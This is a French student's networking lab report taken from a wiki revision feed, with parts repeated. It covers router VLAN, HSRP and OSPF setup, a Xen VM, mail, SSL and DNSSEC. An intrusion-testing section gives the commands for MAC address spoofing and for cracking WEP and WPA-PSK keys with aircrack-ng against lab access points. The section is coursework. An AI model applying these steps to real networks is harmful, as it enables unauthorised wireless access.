&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
Pour cela j'installe aircrack.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install aircrack-ng&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Modification du fichier /etc/apt/sources.list : &lt;br /&gt;
rajout de contrib non-free&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/network/interfaces : &lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static &lt;br /&gt;
     address 172.20.106.6&lt;br /&gt;
     netmask 255.255.255.0&lt;br /&gt;
     gateway 172.20.106.254&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/resolv.conf : &lt;br /&gt;
nameserver 193.48.57.34&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install firmware-linux-nonfree&lt;br /&gt;
apt-get remove network-manager&lt;br /&gt;
apt-get install broadcom-sta-dkms&lt;br /&gt;
modprobe wl&lt;br /&gt;
modprobe -r b44 b43 b43legacy ssb brcmsmac&lt;br /&gt;
modprobe -r wl&lt;br /&gt;
modprobe wl*dmseg&lt;br /&gt;
dmseg&lt;br /&gt;
ifconfig -a &lt;br /&gt;
reboot&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
code :&lt;br /&gt;
airmon -ng start wlan1 ==&amp;gt; cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin&lt;br /&gt;
soltion : apt-get install firmware-ralink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0&lt;br /&gt;
&lt;br /&gt;
Je ré-ouvre une mon0.&lt;br /&gt;
&lt;br /&gt;
J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.&lt;br /&gt;
&lt;br /&gt;
Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.&lt;br /&gt;
&lt;br /&gt;
Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)&lt;br /&gt;
&lt;br /&gt;
code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.&lt;br /&gt;
&lt;br /&gt;
Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va commencer par créer un dictionnaire  de clé : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main (void)&lt;br /&gt;
{&lt;br /&gt;
    int i=0;&lt;br /&gt;
    while(i&amp;lt;100000000)&lt;br /&gt;
    {&lt;br /&gt;
        printf(&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
        i++;&lt;br /&gt;
    }&lt;br /&gt;
    return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite récupérer le handshake :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
df&lt;br /&gt;
fdisk -l&lt;br /&gt;
mkfs /dev/sda1&lt;br /&gt;
mount /dev/sda1 /mnt&lt;br /&gt;
cp handshake-01.cap /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que le fichier est sur pifou, je lance le traitement :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w dico.txt handshake-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : Connexion sur Weppes puis ssh root@193.57.48.183&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je commence par installer sur la machine virtuellepostfix et bsd-mailx :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install postfix&lt;br /&gt;
vim /etc/aliases ==&amp;gt; rajout d'une ligne admin:   root&lt;br /&gt;
newaliases&lt;br /&gt;
apt-get install mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. &lt;br /&gt;
&lt;br /&gt;
En utilisant &amp;quot;p&amp;quot; je peux l'afficher.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Sécurisation de site web par certificat&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant je vais réclamer mon certificat : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Je vais sur le site de gandi&lt;br /&gt;
Je clique sur Certificat SSL qui est actuellement inactif&lt;br /&gt;
Je vais dans la FAQ et je cherche comment générer une CSR ? &lt;br /&gt;
Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM&lt;br /&gt;
Country Name (2 letter code) [AU]: FR&lt;br /&gt;
State or Province Name (full name) [Some-State]: Nord&lt;br /&gt;
Locality Name (eg, city) []: Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille&lt;br /&gt;
Organizational Unit Namec SSLCertificateChainFile.  (eg, section) []: &lt;br /&gt;
Common Name (eg, YOUR name) []: hunt3r.lol&lt;br /&gt;
Email Address []: admin@hunt3r.lol&lt;br /&gt;
A challenge password []: &lt;br /&gt;
An optional company name []:&lt;br /&gt;
Il me génère donc deux fichiers, le .csr et le .key&lt;br /&gt;
J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.&lt;br /&gt;
&lt;br /&gt;
Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)&lt;br /&gt;
Je valide ma demande grâce au code reçu dans ma boite mail hunt3r et j'attends le certificat.&lt;br /&gt;
Une fois reçu je crée un fichier Werewolf.cer et je colle le certificat que j'ai récupéré.&lt;br /&gt;
Même chose pour les certificats intermédiaire.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je peux commencer alors la configuration d'apache2 avec mon certificat :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cd /etc/apache2/sites-available&lt;br /&gt;
vim default-ssl.conf&lt;br /&gt;
                SSLCertificateFile      /root/Werewolf.cer&lt;br /&gt;
                SSLCertificateKeyFile /root/Werewolf.key&lt;br /&gt;
                #SSLCertificateChainFile /root/WerewolfInter.cer&lt;br /&gt;
&lt;br /&gt;
3 commandes me permettent de mettre en route le tout :&lt;br /&gt;
a2ensite default-ssl&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
service apache2 restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait, lorsque je vais sur ma page internet je remarque je peux y aller à la fois normalement c'est à dire en écrivant : http://www.hunt3r.lol/ mais aussi en utilisant la connexion sécurisée : https://www.hunt3r.lol/. On remarque qu'avec l'https on a bien un cadenas.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Sécurisation de serveur DNS par DNSSEC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cd /etc/bind&lt;br /&gt;
vim named.conf.options ==&amp;gt; rajout de l'option dnssec-enable yes;&lt;br /&gt;
mkdir hunt3r.dnssec&lt;br /&gt;
cd hunt3r.dnssec&lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE -r /dev/urandom hunt3r.dnssec&lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -n ZONE -r /dev/urandom hunt3r.dnssec&lt;br /&gt;
Je renomme les fichiers créé en : &lt;br /&gt;
    *hunt3r-ksk.key&lt;br /&gt;
    *hunt3r-ksk.private&lt;br /&gt;
    *hunt3r-zsk.key&lt;br /&gt;
    *hunt3r-zsk.private&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;br /&gt;
&lt;br /&gt;
Arrivée au partitionnement :&lt;br /&gt;
&lt;br /&gt;
J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. &lt;br /&gt;
Nom du miroir de l'archive Debian : debian.polytech-lille.fr&lt;br /&gt;
Mandataire HTTP : http://proxy.polytech-lille.fr:3128&lt;br /&gt;
Logiciels à installer : Xfce, service SSH  et utilitaies usuels du système (à valider à l'aider de la barre espace)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23154</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23154"/>
				<updated>2015-11-23T16:03:50Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;1&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;default&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
Pour cela j'installe aircrack.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install aircrack-ng&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Modification du fichier /etc/apt/sources.list : &lt;br /&gt;
rajout de contrib non-free&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/network/interfaces : &lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static &lt;br /&gt;
     address 172.20.106.6&lt;br /&gt;
     netmask 255.255.255.0&lt;br /&gt;
     gateway 172.20.106.254&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/resolv.conf : &lt;br /&gt;
nameserver 193.48.57.34&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install firmware-linux-nonfree&lt;br /&gt;
apt-get remove network-manager&lt;br /&gt;
apt-get install broadcom-sta-dkms&lt;br /&gt;
modprobe wl&lt;br /&gt;
modprobe -r b44 b43 b43legacy ssb brcmsmac&lt;br /&gt;
modprobe -r wl&lt;br /&gt;
modprobe wl*dmseg&lt;br /&gt;
dmseg&lt;br /&gt;
ifconfig -a &lt;br /&gt;
reboot&lt;br /&gt;
